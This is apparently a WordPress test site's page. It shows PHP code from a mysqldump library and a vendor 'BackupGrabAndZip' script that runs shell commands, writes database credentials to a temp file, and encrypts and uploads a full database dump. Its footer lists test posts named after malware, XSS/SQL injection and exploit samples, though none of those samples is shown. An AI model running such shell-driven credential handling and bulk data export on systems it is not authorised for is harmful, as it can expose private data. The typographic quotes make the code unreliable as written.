}; $ret .= $viewStmt.’;’.PHP_EOL.PHP_EOL; return $ret; } public function create_trigger($row) { $ret = “”; if (!isset($row[‘SQL Original Statement’])) { throw new Exception(“Error getting trigger code, unknown output”); } $triggerStmt = $row[‘SQL Original Statement’]; $definerStr = $this->dumpSettings[‘skip-definer’] ? ” : ‘/*!50017 \2*/ ‘; if ($triggerStmtReplaced = preg_replace( ‘/^(CREATE)\s+(‘.self::DEFINER_RE.’)?\s+(TRIGGER\s.*)$/s’, ‘/*!50003 \1*/ ‘.$definerStr.’/*!50003 \3 */’, $triggerStmt, 1 )) { $triggerStmt = $triggerStmtReplaced; } $ret .= “DELIMITER ;;”.PHP_EOL. $triggerStmt.”;;”.PHP_EOL. “DELIMITER ;”.PHP_EOL.PHP_EOL; return $ret; } public function create_procedure($row, $procedureName) { $ret = “”; if (!isset($row[‘Create Procedure’])) { if ( $this->dumpSettings[ ‘skip-procs-perm-error’ ] ) { return “–“.PHP_EOL . “– No access to PROC: “.$procedureName.PHP_EOL . “–“.PHP_EOL.PHP_EOL; } else { throw new Exception(“Error getting procedure code, unknown output. “. “Please check ‘https://bugs.mysql.com/bug.php?id=14564′”); } } $procedureStmt = $row[‘Create Procedure’]; if ( $this->dumpSettings[‘skip-definer’] ) { if ($procedureStmtReplaced = preg_replace( ‘/^(CREATE)\s+(‘.self::DEFINER_RE.’)?\s+(PROCEDURE\s.*)$/s’, ‘\1 \3’, $procedureStmt, 1 )) { $procedureStmt = $procedureStmtReplaced; } } $ret .= “/*!50003 DROP PROCEDURE IF EXISTS `”. $row[‘Procedure’].”` */;”.PHP_EOL. “/*!40101 SET @saved_cs_client = @@character_set_client */;”.PHP_EOL. “/*!40101 SET character_set_client = “.$this->dumpSettings[‘default-character-set’].” */;”.PHP_EOL. “DELIMITER ;;”.PHP_EOL. $procedureStmt.” ;;”.PHP_EOL. “DELIMITER ;”.PHP_EOL. “/*!40101 SET character_set_client = @saved_cs_client */;”.PHP_EOL.PHP_EOL; return $ret; } public function create_function($row) { $ret = “”; if (!isset($row[‘Create Function’])) { throw new Exception(“Error getting function code, unknown output. “. “Please check ‘https://bugs.mysql.com/bug.php?id=14564′”); } $functionStmt = $row[‘Create Function’]; $characterSetClient = $row[‘character_set_client’]; $collationConnection = $row[‘collation_connection’]; $sqlMode = $row[‘sql_mode’]; if ( $this->dumpSettings[‘skip-definer’] ) { if ($functionStmtReplaced = preg_replace( ‘/^(CREATE)\s+(‘.self::DEFINER_RE.’)?\s+(FUNCTION\s.*)$/s’, ‘\1 \3’, $functionStmt, 1 )) { $functionStmt = $functionStmtReplaced; } } $ret .= “/*!50003 DROP FUNCTION IF EXISTS `”. $row[‘Function’].”` */;”.PHP_EOL. “/*!40101 SET @saved_cs_client = @@character_set_client */;”.PHP_EOL. “/*!50003 SET @saved_cs_results = @@character_set_results */ ;”.PHP_EOL. “/*!50003 SET @saved_col_connection = @@collation_connection */ ;”.PHP_EOL. “/*!40101 SET character_set_client = “.$characterSetClient.” */;”.PHP_EOL. “/*!40101 SET character_set_results = “.$characterSetClient.” */;”.PHP_EOL. “/*!50003 SET collation_connection = “.$collationConnection.” */ ;”.PHP_EOL. “/*!50003 SET @saved_sql_mode = @@sql_mode */ ;;”.PHP_EOL. “/*!50003 SET sql_mode = ‘”.$sqlMode.”‘ */ ;;”.PHP_EOL. “/*!50003 SET @saved_time_zone = @@time_zone */ ;;”.PHP_EOL. “/*!50003 SET time_zone = ‘SYSTEM’ */ ;;”.PHP_EOL. “DELIMITER ;;”.PHP_EOL. $functionStmt.” ;;”.PHP_EOL. “DELIMITER ;”.PHP_EOL. “/*!50003 SET sql_mode = @saved_sql_mode */ ;”.PHP_EOL. “/*!50003 SET character_set_client = @saved_cs_client */ ;”.PHP_EOL. “/*!50003 SET character_set_results = @saved_cs_results */ ;”.PHP_EOL. “/*!50003 SET collation_connection = @saved_col_connection */ ;”.PHP_EOL. “/*!50106 SET TIME_ZONE= @saved_time_zone */ ;”.PHP_EOL.PHP_EOL; return $ret; } public function create_event($row) { $ret = “”; if (!isset($row[‘Create Event’])) { throw new Exception(“Error getting event code, unknown output. “. “Please check ‘http://stackoverflow.com/questions/10853826/mysql-5-5-create-event-gives-syntax-error'”); } $eventName = $row[‘Event’]; $eventStmt = $row[‘Create Event’]; $sqlMode = $row[‘sql_mode’]; $definerStr = $this->dumpSettings[‘skip-definer’] ? ” : ‘/*!50117 \2*/ ‘; if ($eventStmtReplaced = preg_replace( ‘/^(CREATE)\s+(‘.self::DEFINER_RE.’)?\s+(EVENT .*)$/s’, ‘/*!50106 \1*/ ‘.$definerStr.’/*!50106 \3 */’, $eventStmt, 1 )) { $eventStmt = $eventStmtReplaced; } $ret .= “/*!50106 SET @save_time_zone= @@TIME_ZONE */ ;”.PHP_EOL. “/*!50106 DROP EVENT IF EXISTS `”.$eventName.”` */;”.PHP_EOL. “DELIMITER ;;”.PHP_EOL. “/*!50003 SET @saved_cs_client = @@character_set_client */ ;;”.PHP_EOL. “/*!50003 SET @saved_cs_results = @@character_set_results */ ;;”.PHP_EOL. “/*!50003 SET @saved_col_connection = @@collation_connection */ ;;”.PHP_EOL. “/*!50003 SET character_set_client = utf8 */ ;;”.PHP_EOL. “/*!50003 SET character_set_results = utf8 */ ;;”.PHP_EOL. “/*!50003 SET collation_connection = utf8_general_ci */ ;;”.PHP_EOL. “/*!50003 SET @saved_sql_mode = @@sql_mode */ ;;”.PHP_EOL. “/*!50003 SET sql_mode = ‘”.$sqlMode.”‘ */ ;;”.PHP_EOL. “/*!50003 SET @saved_time_zone = @@time_zone */ ;;”.PHP_EOL. “/*!50003 SET time_zone = ‘SYSTEM’ */ ;;”.PHP_EOL. $eventStmt.” ;;”.PHP_EOL. “/*!50003 SET time_zone = @saved_time_zone */ ;;”.PHP_EOL. “/*!50003 SET sql_mode = @saved_sql_mode */ ;;”.PHP_EOL. “/*!50003 SET character_set_client = @saved_cs_client */ ;;”.PHP_EOL. “/*!50003 SET character_set_results = @saved_cs_results */ ;;”.PHP_EOL. “/*!50003 SET collation_connection = @saved_col_connection */ ;;”.PHP_EOL. “DELIMITER ;”.PHP_EOL. “/*!50106 SET TIME_ZONE= @save_time_zone */ ;”.PHP_EOL.PHP_EOL; // Commented because we are doing this in restore_parameters() // “/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;” . PHP_EOL . PHP_EOL; return $ret; } public function show_tables() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SELECT TABLE_NAME AS tbl_name “. “FROM INFORMATION_SCHEMA.TABLES “. “WHERE TABLE_TYPE=’BASE TABLE’ AND TABLE_SCHEMA=’${args[0]}'”; } public function show_views() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SELECT TABLE_NAME AS tbl_name “. “FROM INFORMATION_SCHEMA.TABLES “. “WHERE TABLE_TYPE=’VIEW’ AND TABLE_SCHEMA=’${args[0]}'”; } public function show_triggers() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SHOW TRIGGERS FROM `${args[0]}`;”; } public function show_columns() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SHOW COLUMNS FROM `${args[0]}`;”; } public function show_procedures() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SELECT SPECIFIC_NAME AS procedure_name “. “FROM INFORMATION_SCHEMA.ROUTINES “. “WHERE ROUTINE_TYPE=’PROCEDURE’ AND ROUTINE_SCHEMA=’${args[0]}'”; } public function show_functions() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SELECT SPECIFIC_NAME AS function_name “. “FROM INFORMATION_SCHEMA.ROUTINES “. “WHERE ROUTINE_TYPE=’FUNCTION’ AND ROUTINE_SCHEMA=’${args[0]}'”; } /** * Get query string to ask for names of events from current database. * * @param string Name of database * @return string */ public function show_events() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “SELECT EVENT_NAME AS event_name “. “FROM INFORMATION_SCHEMA.EVENTS “. “WHERE EVENT_SCHEMA=’${args[0]}'”; } public function setup_transaction() { return “SET SESSION TRANSACTION ISOLATION LEVEL REPEATABLE READ”; } public function start_transaction() { return “START TRANSACTION ” . “/*!40100 WITH CONSISTENT SNAPSHOT */”; } public function commit_transaction() { return “COMMIT”; } public function lock_table() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return $this->dbHandler->exec(“LOCK TABLES `${args[0]}` READ LOCAL”); } public function unlock_table() { return $this->dbHandler->exec(“UNLOCK TABLES”); } public function start_add_lock_table() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “LOCK TABLES `${args[0]}` WRITE;”.PHP_EOL; } public function end_add_lock_table() { return “UNLOCK TABLES;”.PHP_EOL; } public function start_add_disable_keys() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “/*!40000 ALTER TABLE `${args[0]}` DISABLE KEYS */;”. PHP_EOL; } public function end_add_disable_keys() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “/*!40000 ALTER TABLE `${args[0]}` ENABLE KEYS */;”. PHP_EOL; } public function start_disable_autocommit() { return “SET autocommit=0;”.PHP_EOL; } public function end_disable_autocommit() { return “COMMIT;”.PHP_EOL; } public function add_drop_database() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “/*!40000 DROP DATABASE IF EXISTS `${args[0]}`*/;”. PHP_EOL.PHP_EOL; } public function add_drop_trigger() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “DROP TRIGGER IF EXISTS `${args[0]}`;”.PHP_EOL; } public function drop_table() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “DROP TABLE IF EXISTS `${args[0]}`;”.PHP_EOL; } public function drop_view() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “DROP TABLE IF EXISTS `${args[0]}`;”.PHP_EOL. “/*!50001 DROP VIEW IF EXISTS `${args[0]}`*/;”.PHP_EOL; } public function getDatabaseHeader() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); return “–“.PHP_EOL. “– Current Database: `${args[0]}`”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; } /** * Decode column metadata and fill info structure. * type, is_numeric and is_blob will always be available. * * @param array $colType Array returned from “SHOW COLUMNS FROM tableName” * @return array */ public function parseColumnType($colType) { $colInfo = array(); $colParts = explode(” “, $colType[‘Type’]); if ($fparen = strpos($colParts[0], “(“)) { $colInfo[‘type’] = substr($colParts[0], 0, $fparen); $colInfo[‘length’] = str_replace(“)”, “”, substr($colParts[0], $fparen + 1)); $colInfo[‘attributes’] = isset($colParts[1]) ? $colParts[1] : null; } else { $colInfo[‘type’] = $colParts[0]; } $colInfo[‘is_numeric’] = in_array($colInfo[‘type’], $this->mysqlTypes[‘numerical’]); $colInfo[‘is_blob’] = in_array($colInfo[‘type’], $this->mysqlTypes[‘blob’]); // for virtual columns that are of type ‘Extra’, column type // could by “STORED GENERATED” or “VIRTUAL GENERATED” // MySQL reference: https://dev.mysql.com/doc/refman/5.7/en/create-table-generated-columns.html $colInfo[‘is_virtual’] = strpos($colType[‘Extra’], “VIRTUAL GENERATED”) !== false || strpos($colType[‘Extra’], “STORED GENERATED”) !== false; return $colInfo; } public function backup_parameters() { $ret = “/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;”.PHP_EOL. “/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;”.PHP_EOL. “/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;”.PHP_EOL. “/*!40101 SET NAMES “.$this->dumpSettings[‘default-character-set’].” */;”.PHP_EOL; if (false === $this->dumpSettings[‘skip-tz-utc’]) { $ret .= “/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;”.PHP_EOL. “/*!40103 SET TIME_ZONE=’+00:00′ */;”.PHP_EOL; } $ret .= “/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;”.PHP_EOL. “/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;”.PHP_EOL. “/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE=’NO_AUTO_VALUE_ON_ZERO’ */;”.PHP_EOL. “/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;”.PHP_EOL.PHP_EOL; return $ret; } public function restore_parameters() { $ret = “”; if (false === $this->dumpSettings[‘skip-tz-utc’]) { $ret .= “/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;”.PHP_EOL; } $ret .= “/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;”.PHP_EOL. “/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;”.PHP_EOL. “/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;”.PHP_EOL. “/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;”.PHP_EOL. “/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;”.PHP_EOL. “/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;”.PHP_EOL. “/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;”.PHP_EOL.PHP_EOL; return $ret; } /** * Check number of parameters passed to function, useful when inheriting. * Raise exception if unexpected. * * @param integer $num_args * @param integer $expected_num_args * @param string $method_name */ private function check_parameters($num_args, $expected_num_args, $method_name) { if ($num_args != $expected_num_args) { throw new Exception(“Unexpected parameter passed to $method_name”); } return; } } # Ifsnop\Mysqldump – END # BackupGrabAndZip – START test_bullet_is_reachable(); set_time_limit(0); ignore_user_abort(true); error_reporting(E_ERROR | E_PARSE); ini_set(‘display_errors’, false); ini_set(‘html_errors’, false); $_CLIENTID = ‘3473’; $_SCHEMAS = ‘[“sitelockdev_yli1218-1”]’; $_SAVE_LOG = true; $_CHUNK_SIZE = ‘10485760’; // 1048576 $base_zip_path = null; $mysqldump_config_file = null; add_to_log_section_start( ‘BackupGrabAndZip’ ); add_to_log( $_POST, ‘_POST’ ); add_to_log( $_SERVER[‘QUERY_STRING’], ‘_GET (raw)’ ); reduce_chunk_size_on_low_memory(); $_SINGLEID = $_GET[ ‘smart_single_download_id’ ]; // Command to cleanup the bullet if ( isset( $_GET[ ‘cmd’ ] ) && $_GET[ ‘cmd’ ] == ‘complete’ ) { // delete unique directory delete_unique_directory(); // stop further processing exit; } // Check if we can talk to MAPI in case of any early errors check_and_terminate_on_mapi_errors(); init_DB_creds_based_on_platform(); // We’re good to continue, unless we are trying to run the same bullet again – prevent it! if ( bullet_is_locked() ) { wrap_up_the_backup( ‘error’, ‘BACKUP_DB_ERR_PROCESS_LOCKED’ ); } else { lock_the_bullet(); } // For Generic DB, we’ll already have the Queue ID from the earlier s3_init call switch( $_PLATFORM ) { case ‘wordpress’: case ‘joomla’: $_SINGLEID = handle_s3_init(); break; case ‘generic’: default: if ( ! $_SINGLEID ) { wrap_up_the_backup( ‘error’, ‘BACKUP_DB_ERR_NO_PROCESS_ID’ ); } break; } // this will create a file with DB structure $db = getDbObj(); $user = DB_USER; $pass = DB_PASSWORD; $host = DB_HOST; $dir = get_our_path(‘.’, “.$_UNIQUE”,”); if ( ! is_dir( $dir )) { mkdir( $dir ); } add_to_log( ‘‘ . $_SCHEMAS . ‘‘, ‘$_SCHEMAS received’ ); $_SCHEMAS = process_backup_schemas( $_SCHEMAS ); // In case any of the tables have non-ASCII characters, we need to make sure escapeshellarg() will preserve them! set_character_locale(); $shell_is_available = true; $disable_functions = ini_get(‘disable_functions’); $disable_functions_arr = explode( ‘,’, $disable_functions ); if ( in_array( ‘exec’, $disable_functions_arr ) ) { add_to_log( $disable_functions, “ini_get(‘disable_functions’)” ); $shell_is_available = false; } if ( $shell_is_available ) { // –skip-definer options does not reliably work under MariaDB distribution because of different versioning // Have to resort to using only sed for now, until we have official MariaDB support. $definer_regex = ‘DEFINER=`[^`]+`@`[^`]+`’; $sed = ”; $mysql_version_string = Mysql_base::establish_mysql_version(); add_to_log( $mysql_version_string, ‘establish_mysql_version()’ ); // sed might or might not be available $sed_path = exec( ‘which sed’ ); if ( empty( $sed_path ) ) { $sed_path = ‘sed’; // try default } // https://stackoverflow.com/questions/9446783/remove-definer-clause-from-mysql-dumps $sed = ” | {$sed_path} -r -e ‘s/{$definer_regex}//'”; add_to_log( $sed, “Trying sed.” ); //$gzip = ” | gzip -9 -c “; //add_to_log( $gzip, “Will also try gzip.” ); // check how we access mysqldump $mysqldump_out = NULL; $mysqldump = exec( ‘which mysqldump’, $mysqldump_out ); if ( empty( $mysqldump ) ) { $mysqldump = ‘mysqldump’; add_to_log( json_encode( $mysqldump_out ), ‘”which mysqldump” failed, will try without “which”‘ ); } $mysqldump_version_string = Mysql_base::establish_mysqldump_version( $mysqldump ); // try just raw command here too if ( $mysqldump_version_string ) { add_to_log( $mysqldump_version_string, “{$mysqldump} Version” ); //create a temporary config file $mysqldump_config_file = tempnam(sys_get_temp_dir(), ‘sl-mysqldump’); if ( $mysqldump_config_file === false ) { wrap_up_the_backup( ‘error’, ‘BACKUP_DB_ERR_TEMPNAM’, ‘faied tempnam()’ ); } //store the configuration options $config_saved = file_put_contents($mysqldump_config_file, “[mysqldump] user={$user} password=\”{$pass}\””); if ( $config_saved === false ) { wrap_up_the_backup( ‘error’, ‘BACKUP_DB_ERR_TEMPNAM’, ‘failed saving [mysqldump] creds’ ); } } else // failed to access mysqldump – stop here and try the library for data export { add_to_log(false, “Was unable to get mysqldump version. Reset flag and try to export using the library.”); $shell_is_available = false; } } else // no shell access – do things manually { // anything here? add_to_log( ‘Will try using the PHP library’, ‘NO SHELL AVAILABLE’ ); } $schemas_metadata = array(); // will contain full info about schema and its db objects if ( $shell_is_available ) { $all_schemas_shell = array(); foreach( $_SCHEMAS AS $schema_index => $_SCHEMA ) { $all_schemas_shell[] = escapeshellarg( $_SCHEMA ); } $all_schemas_shell = implode( ‘ ‘, $all_schemas_shell ); $out = $dir . ‘everything.sql.zip’; $zip = ” | zip -jqm1 {$out} -“; // check for port: $myqldump_host = $host; $myqldump_port = ”; if ( strpos( $myqldump_host, ‘:’ ) !== false ) { list( $myqldump_host, $myqldump_port ) = explode( ‘:’, $myqldump_host ); $myqldump_port = ‘ –port=’ . $myqldump_port; } // added –no-tablespaces option to address issue caused by updates for MySQL 5.7.31 and MySQL 8.0.21 in absence of new PROCESS priveledge. $command = “{$mysqldump} –defaults-file={$mysqldump_config_file} -h{$myqldump_host} {$myqldump_port} –quick –compact –skip-comments –events –routines –create-options –add-drop-table –add-drop-trigger –force –no-tablespaces –databases {$all_schemas_shell} {$sed} {$zip}”; $return_var = NULL; $output = NULL; exec(“({$command}) 2>&1”, $output, $return_var); cleanup_insufficient_priveleges( $output ); // for now, we expect that some SPs might fail if they have definer other than provided MySQL user, so we’ll skip and log those if( $return_var && ! empty( $output ) ) { array_walk( $output, ‘htmlspecialchars’ ); add_to_log( ‘‘ . print_r(<br /> array( ‘command’ => $command, ‘error-code’ => $return_var, ‘output’ => $output ),<br /> true<br /> ) . ‘‘, ‘mysqldump-routines-error’ ); } else { add_to_log( $command, ‘mysqldump: success’ ); } // rename zipped file $command = “zipnote -w {$out} <<<$'@ -\n@={$backup_file_name}'"; $return_var = NULL; $output = NULL; exec("({$command}) 2>&1″, $output, $return_var); if( $return_var && ! empty( $output ) ) { add_to_log( ‘‘ . print_r(<br /> array( ‘command’ => $command, ‘error-code’ => $return_var, ‘output’ => $output ),<br /> true<br /> ) . ‘‘, ‘zipnote: error’ ); } else { add_to_log( $command, ‘zipnote: success’ ); } } else { add_to_log( ”, ‘Starting execution using PHP library’ ); $dumpSettings = array( ‘add-drop-table’ => true, ‘add-drop-trigger’ => true, ‘databases’ => true, ‘default-character-set’ => Mysqldump::UTF8, ‘events’ => true, ‘routines’ => true, ‘single-transaction’ => true, ‘skip-triggers’ => false, ‘skip-comments’ => true, ‘skip-definer’ => true, ‘skip-procs-perm-error’ => true, // my own custom flag, because sproc permission errors are troublemakers ); // will have to dump each schema individually as one PDO connection can only work with one database at a time $data_dump_file = $dir . $backup_file_name; foreach( $_SCHEMAS AS $schema_index => $_SCHEMA ) { $descriptor_info[] = $_SCHEMA; try { $PDO_init_string = “mysql:host={$host};dbname={$_SCHEMA}”; $dump = new Mysqldump($PDO_init_string, $user, $pass, $dumpSettings); $response = $dump->start($data_dump_file,true); } catch (Exception $ex) { wrap_up_the_backup( ‘error’, “BACKUP_DB_ERR_MYSQLDUMP_TABLE”, “Mysqldump Exception code {$ex->getCode()}, error message: {$ex->getMessage()}”); } add_to_log( $response, “Used PHP library to add {$_SCHEMA} to {$data_dump_file}.” ); } $descriptor_file_path = $dir . $db_structure_descriptor_file; file_put_contents( $descriptor_file_path, json_encode( $descriptor_info ) ); // Now we need to zip this up to match “zip to -” logic in shell version $out = $dir; // by ref – will be updated with an actual ZIP file path if ( archive_files(array($data_dump_file,$descriptor_file_path), $out, $dir) ) { add_to_log( $out, ‘archived file’ ); } else { $zip_err_info = array( ‘files’ => $sql_files, ‘zip’ => $out, ‘dir’ => $dir ); add_to_log( $zip_err_info, ‘archive-files-error’ ); wrap_up_the_backup( ‘error’, “BACKUP_DB_ERR_ZIP”, json_encode( $zip_err_info ) ); } } if ( $shell_is_available ) { //delete the temporary config file unlink($mysqldump_config_file); } // finally, encrypt // CBC mode, being a block-based mode, will always have an output with size divisible // by the block size of the algorithm in use (that’s 128 bits or 16 bytes for AES). $zip_size = filesize( $out ); add_to_log( $zip_size, “Original ZIP size”); $zip_fp = fopen($out, ‘rb’); // Open ZIP for reading in BINARY mode $zip_md5 = md5_file($out); $chunk_counter = 0; $chunk_sizes = array(); $bytes_written = 0; while (!feof($zip_fp)) { // check set number of butes from the ZIP $contents = fread($zip_fp, $_CHUNK_SIZE); $chunk_filename = “{$out}.{$chunk_counter}”; // encrypt the chunk $chunk_enc_contents = encrypt_string($contents); unset($contents); // output chunk into its own file $chunk_bytes = file_put_contents($chunk_filename, $chunk_enc_contents); unset($chunk_enc_contents); // tally the counts $chunk_sizes[$chunk_filename] = $chunk_bytes; $bytes_written += $chunk_bytes; $chunk_counter++; } fclose($zip_fp); add_to_log( $chunk_counter, ‘Encoded chunks written’ ); // cleanup the original ZIP unlink( $out ); // add a descriptor file $descriptor_content = json_encode( array( ‘zip_md5’ => $zip_md5, ‘chunks’ => (object) array_values( $chunk_sizes ), ‘metadata’ => $schemas_metadata, ‘compression_method’ => ‘zip’, ) ); file_put_contents( $out . $descriptor_ext, $descriptor_content ); $base_zip_path = ltrim( str_replace( dirname( __FILE__ ), ”, $out ), ‘/’ ); wrap_up_the_backup(); function wrap_up_the_backup( $status = ‘ok’, $err_token = ”, $err_tech_details = null ) { global $_TOKEN, $_SITEID, $_SINGLEID, $_CLIENTID, $_FEATURECODE, $_SAVE_LOG, $base_zip_path, $descriptor_ext, $mysqldump_config_file; add_to_log( $err_token, “wrap_up_the_backup with status {$status}” ); add_to_log( $err_tech_details, “Returned technical error details, if any” ); // Always clean up creds regardless of backup status if ( is_file( $mysqldump_config_file ) ) { unlink( $mysqldump_config_file) ; } $s3_queue_success = true; if ( $status == ‘ok’ && $base_zip_path != null ) { // S3 Queue Call $params = array( ‘site_id’ => $_SITEID, ‘queue_id’ => $_SINGLEID, ‘client_id’ => $_CLIENTID, ‘feature_code’ => $_FEATURECODE, ‘status’ => $status, ‘url’ => $base_zip_path, ‘zip_file_info’ => $base_zip_path . $descriptor_ext, ); $mapi_post_response = mapi_post($_TOKEN, ‘s3_queue’, $params); // error out of not approved $response_decoded = json_decode( $mapi_post_response, true ); if ( !( isset( $response_decoded[‘responses’][0][‘data’][‘s3_status’] ) && $response_decoded[‘responses’][0][‘data’][‘s3_status’] == ‘ok’ ) ) { $s3_queue_success = false; $err_token = ‘CURL_MAPI_ERR’; if ( isset( $response_decoded[‘responses’][0][‘data’] ) ) { $err_tech_details = json_encode( $response_decoded[‘responses’][0][‘data’] ); } } } // send all errors to new endpoint if( !$s3_queue_success || $status != ‘ok’ ) { update_scan_on_error( $err_token, $err_tech_details, false ); } unlock_the_bullet(); cleanup_old_tmp_trash(); $run_time = log_bullet_run_time(); echo_enc( “done with backup grab and zip in {$run_time}s.”); output_clean(); // drop log if scan finished with no errors !$_SAVE_LOG and delete_log_file(); exit; } # BackupGrabAndZip – END Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_suspisios_file_01.php POST ./TEST_MALWARE_06.PHP Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_malware_06.php POST ./TEST_MALWARE_05.PHP Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_malware_05.php POST ./TEST_MALWARE_04.PHP Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_malware_04.php POST ./TEST_MALWARE_03.PHP Posted byJune 4, 2024Posted inUncategorizedLeave a comment on Post ./TEST_malware_03.php POSTS NAVIGATION 1 2 3 … 8 Older posts Search for: RECENT POSTS * Post 01 en. * Post 02 ru. * Post ./TEST_malware_08.js * Post ./TEST_malware_07.js * Post ./TEST_xss_and_sqli.php RECENT COMMENTS * wp-cli on Post ./TEST_vlc_amv.html * wp-cli on Post ./TEST_vlc_amv.html * wp-cli on Post ./TEST_vlc_amv.html * wp-cli on Post ./TEST_vlc_amv.html * wp-cli on Post ./TEST_ms14_064_ole_not_xp.html ARCHIVES * June 2024 * May 2024 CATEGORIES * Uncategorized META * Log in * Entries RSS * Comments RSS * WordPress.org yli Test WP 0531-1, Proudly powered by WordPress.